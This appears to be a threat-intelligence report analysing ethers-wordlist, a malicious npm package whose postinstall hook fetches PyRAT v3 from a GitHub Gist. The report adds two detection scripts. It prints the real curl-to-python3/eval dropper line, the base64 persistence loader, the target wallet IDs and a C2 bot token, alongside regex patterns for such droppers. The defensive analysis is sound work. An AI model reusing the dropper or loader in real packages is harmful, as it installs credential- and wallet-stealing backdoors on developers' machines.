ethers-wordlist - Remote Gist Dropper Delivering PyRAT Cross-Platform Stealer
One of ten packages in the long01 cluster targeting Web3/Solidity developers. ethers-wordlist@1.0.0 is a malicious npm package whose postinstall hook fetches build_utils.py from a GitHub Gist (guellemilb) via curl/wget and executes it via python3 or node with eval(). The fetched payload is PyRAT v3, a fully-featured cross-platform Python RAT written in Chinese. On install it beacons to a Telegram C2, installs platform-appropriate persistence (crontab/bashrc on Linux, launchd plist/zshrc on macOS, HKCU Run registry/Startup folder on Windows), then runs a full credential sweep: browser-stored wallet extension data (14 wallets including MetaMask, Phantom, Rabby), browser passwords and cookies filtered to crypto exchanges, SSH private keys, AWS credentials, .env files, .npmrc, git config, and macOS Keychain. The RAT then enters a polling C2 loop accepting commands for on-demand re-stealing, arbitrary shell execution, and remote file download.
Package: ethers-wordlist@1.0.0
Threat Actor: Unknown — Chinese-language tooling
Postinstall Fetcher — Fileless Remote Payload
The package contains no malicious code directly. The entire payload is retrieved at install time from a GitHub Gist, making the npm package itself appear clean to static scanners. Three fetch methods are tried in sequence to maximise cross-platform coverage, with all errors silenced. The eval() call executes whatever the Gist currently contains in the Node process context, meaning the actor can update the payload at any time without republishing the package.
package.json — postinstall fetcher
```json
"postinstall": "node -e \"var p=require('child_process');
p.exec('curl -s https://gist.githubusercontent.com/guellemilb/
631fb6348967d9d475125edf67048c0e/raw/build_utils.py | python3 2>/dev/null
|| curl -s [...] | node 2>/dev/null
|| wget -qO- [...] | python3 2>/dev/null',
function(e,o){if(o)try{eval(o)}catch(x){}});\""
```
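A static check for this dropper shape, added here as example code (not part of the original report or the package): it walks the install-time lifecycle scripts of a package.json and flags a network fetch piped into an interpreter, an eval() on fetched output, a raw Gist URL, and error silencing. The sample manifest is constructed from the postinstall above with a placeholder Gist path.

```python
"""Flag npm lifecycle scripts that fetch a remote payload and pipe it into an
interpreter, the fileless dropper pattern used by ethers-wordlist."""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (finding name, regex applied to the raw script string)
RULES = [
    ("remote-fetch", re.compile(r"\b(curl|wget)\b")),
    ("pipe-to-interpreter", re.compile(r"\|\s*(python3?|node|sh|bash)\b")),
    ("node-eval", re.compile(r"\beval\s*\(")),
    ("gist-raw-url", re.compile(r"gist\.githubusercontent\.com/[^/\s]+/[0-9a-f]{32}/raw")),
    ("error-silencing", re.compile(r"2>/dev/null|catch\s*\(\w*\)\s*\{\s*\}")),
]


def scan_package_json(text):
    """Return (hook, finding) pairs for every rule that fires on an install hook."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not script:
            continue
        findings.extend((hook, name) for name, rx in RULES if rx.search(script))
    return findings


def risk_level(findings):
    """Fetch plus pipe-to-interpreter in one install hook is the dropper signature."""
    names = {name for _, name in findings}
    if {"remote-fetch", "pipe-to-interpreter"} <= names:
        return "high"
    return "medium" if names else "none"


# Constructed sample: shape of the ethers-wordlist postinstall; the Gist owner
# and id are placeholders, not the real indicator.
SAMPLE = json.dumps({
    "name": "example-pkg", "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"var p=require('child_process');"
            "p.exec('curl -s https://gist.githubusercontent.com/EXAMPLE/"
            "00000000000000000000000000000000/raw/build_utils.py | python3 2>/dev/null',"
            "function(e,o){if(o)try{eval(o)}catch(x){}});\""
    },
})

if __name__ == "__main__":
    found = scan_package_json(SAMPLE)
    print(risk_level(found), found)
```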
PyRAT v3 — Cross-Platform RAT with Telegram C2
The fetched payload identifies itself as PyRAT 跨平台轻量版 v3 (Cross-platform lightweight edition v3), written entirely in Chinese. On execution it immediately sends an installation beacon to the Telegram C2, then installs persistence, runs a full credential sweep, and enters a polling loop checking for operator commands every 5 minutes. The C2 loop accepts /偷 (steal), /状态 (status), /执行 (execute shell command), and /下载 (download file) commands — giving the operator full interactive access to the victim machine.
Persistence — All Three Platforms
The RAT base64-encodes itself and installs a self-replicating loader via whichever mechanism is available. On Linux it writes to crontab (every 10 minutes) and ~/.bashrc. On macOS it drops a launchd plist to ~/Library/LaunchAgents/com.apple.utility.plist (masquerading as an Apple system agent) with a 600-second run interval, and appends to ~/.zshrc. On Windows it writes to HKCU Run as PyRATUpdater and drops SystemHelper.bat to the Startup folder. All persistence mechanisms execute the base64-encoded payload via python3 -c.
build_utils.py — macOS launchd persistence
```python
plist路径 = os.path.join(启动代理目录, "com.apple.utility.plist")
# Label: com.apple.utility — masquerades as Apple system agent
# RunAtLoad: true, StartInterval: 600
# Executes: python3 -c 'import base64,sys;exec(base64.b64decode("<self>"))'
```
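A host-side triage check for the persistence described above, added as example code (not the report's or the malware's): it parses a user LaunchAgent plist and crontab or shell-profile lines and flags the base64 self-loader command, an Apple-style label in a per-user agent directory, and the RunAtLoad plus StartInterval combination. The plist and crontab samples are constructed with a placeholder in place of the encoded payload.

```python
"""Triage user-level persistence artefacts for the PyRAT loader pattern
python3 -c 'import base64,sys;exec(base64.b64decode("..."))'."""
import plistlib
import re

# python/python3 -c ... exec(base64.b64decode( : the self-loader command shape.
LOADER_RX = re.compile(r"python3?\s+-c\b.*exec\(base64\.b64decode\(", re.S)


def is_b64_self_loader(command):
    """True if a command line decodes and exec()s an embedded base64 blob."""
    return bool(LOADER_RX.search(command))


def triage_launch_agent(plist_bytes):
    """Return reasons a ~/Library/LaunchAgents plist looks like this persistence."""
    p = plistlib.loads(plist_bytes)
    reasons = []
    # Apple's own agents ship under /System/Library and /Library, not ~/Library.
    if p.get("Label", "").startswith("com.apple."):
        reasons.append("apple-label-in-user-agents")
    if is_b64_self_loader(" ".join(p.get("ProgramArguments", []))):
        reasons.append("base64-self-loader")
    if p.get("RunAtLoad") and p.get("StartInterval"):
        reasons.append("runatload-with-interval")
    return reasons


def triage_shell_lines(lines):
    """Indices of crontab / .bashrc / .zshrc lines carrying the same loader."""
    return [i for i, line in enumerate(lines) if is_b64_self_loader(line)]


# Constructed sample plist matching the report's description (payload is a placeholder).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.apple.utility</string>
<key>ProgramArguments</key><array>
<string>python3</string><string>-c</string>
<string>import base64,sys;exec(base64.b64decode("PLACEHOLDER"))</string>
</array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>600</integer>
</dict></plist>"""

# Constructed crontab: one benign job and one every-10-minutes loader entry.
SAMPLE_CRON = [
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/10 * * * * python3 -c 'import base64,sys;exec(base64.b64decode(\"PLACEHOLDER\"))'",
]

if __name__ == "__main__":
    print(triage_launch_agent(SAMPLE_PLIST), triage_shell_lines(SAMPLE_CRON))
```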
Credential and Wallet Theft
The stealer targets 14 browser wallet extensions by Chrome extension ID, reading LevelDB and SQLite stores from Chrome, Chromium, Brave, Edge, Opera, and OperaGX across all three platforms. Browser Login Data SQLite databases are queried for passwords on crypto exchange and developer service domains (Binance, Coinbase, OKX, GitHub, AWS, Google). Browser Cookies databases are filtered to the same exchange domain list. Platform credential sweeps collect .env files (recursive walk to depth 3), SSH private keys (id_rsa, id_ed25519, id_ecdsa), AWS credentials, .gitconfig, and .npmrc, and on macOS attempt Keychain queries via the security binary. On Windows it additionally queries the Windows Credential Manager via cmdkey /list and scans Desktop/Documents/Downloads for .txt/.log/.cfg files containing credential keywords.
build_utils.py — wallet extension ID list (14 wallets)
```python
钱包列表 = {
"MetaMask": "nkbihfbeogaeaoehlefnkodbefgpgknn",
"Phantom": "bfnaelmomeimhlpmgjnjophhpkkoljpa",
"Rabby": "acmacodkjbdgmoleebolmdjonilkdbch",
"Coinbase": "hnfanknocfeofbddgcijnmhnfnkdnaad",
"Trust Wallet": "egjidjbpglichdcondbcbdnbgprllpj",
"OKX Wallet": "mcohilncbfahbmgdjkbpemcciiolgcge",
"Keplr": "dmkamcknogkgcdfhhbddcghachkejeap",
"Backpack": "akiplfofhhnmdmakkkkccomkflnemflk",
"TronLink": "ibnejdfjmmkpcnlpebklmnkoeoihofec",
# ... and 5 more
}
```
Indicators of Compromise
Malicious Packages
| Package | Version | Author | Notes |
|---|---|---|---|
| ethers-wordlist | 1.0.0 | long01 | Fetcher package; no malicious code on disk; payload retrieved from Gist at install time |
Domains
| Domain | Type | Context |
|---|---|---|
| api.telegram.org | c2 | Sole C2 channel; polling every 300 seconds; bot token 8668865248; chat_id 6015173223 |
URLs
| URL | Context |
|---|---|
| hxxps://gist.githubusercontent[.]com/guellemilb/631fb6348967d9d475125edf67048c0e/raw/build_utils.py | Live remote payload — PyRAT v3; actor (GitHub: guellemilb) can update without touching npm package |
| hxxps://api.telegram[.]org/bot8668865248:AAH9nO1iWx6aBKDm4I8CdErS-R8T5lvPNOo/sendMessage | Telegram C2 beacon and exfiltration endpoint; chat_id 6015173223 |
Targeted File Paths
| Path | Context |
|---|---|
| ~/Library/LaunchAgents/com.apple.utility.plist | macOS persistence; masquerades as Apple system agent; RunAtLoad + 600s interval |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PyRATUpdater | Windows registry persistence key |
| %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\SystemHelper.bat | Windows Startup folder persistence |
| ~/.bashrc / ~/.zshrc | Linux/macOS shell profile persistence |
| ~/.ssh/id_rsa, id_ed25519, id_ecdsa | SSH private keys exfiltrated in full |
| ~/.aws/credentials | AWS credential file |
Environment Variables / Config Paths
| Artefact | Context |
|---|---|
| Browser wallet extension LocalStorage/LevelDB | 14 wallets targeted by Chrome extension ID across 6 browsers |
| Browser Login Data / Cookies | Filtered to crypto exchanges: Binance, Coinbase, OKX, Bybit, KuCoin, gate.io, Kraken |